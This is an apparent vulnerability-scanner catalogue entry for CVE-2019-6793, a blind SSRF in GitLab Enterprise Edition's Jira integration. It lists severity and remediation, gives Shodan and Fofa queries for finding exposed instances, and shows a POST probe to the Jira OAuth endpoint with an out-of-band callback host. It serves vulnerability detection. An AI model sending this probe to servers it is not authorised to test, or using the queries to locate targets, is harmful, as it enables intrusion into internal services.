| Title | GitLab Enterprise Edition - Server-Side Request Forgery |
|---|---|
| Author | ritikchaddha |
| Severity | High |
| Impact | Unauthenticated attackers can exploit blind SSRF to access internal services, potentially retrieving sensitive information or performing unauthorized actions on internal systems. |
| Remediation | Upgrade to GitLab Enterprise Edition 11.5.8, 11.6.6, 11.7.1 or later versions. |
| CVSS Score | 7.0 |
| EPSS Score | 0.03925 |
| CVE ID | CVE-2019-6793 |
| CWE ID | CWE-918 |
| Shodan Query | html:"GitLab Enterprise Edition" |
| Fofa Query | body="GitLab Enterprise Edition" |
| Tags | cve cve2019 gitlab enterprise ssrf blind vuln |
An issue was discovered in GitLab Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. The Jira integration feature is vulnerable to an unauthenticated blind SSRF issue.
POST /-/jira/login/oauth/access_token HTTP/1.1
Host: d5jpidple0o48t5ap2rgom3b5i7wnj19e.oast.pro
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-6793.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-6793.pcap
N/AN/A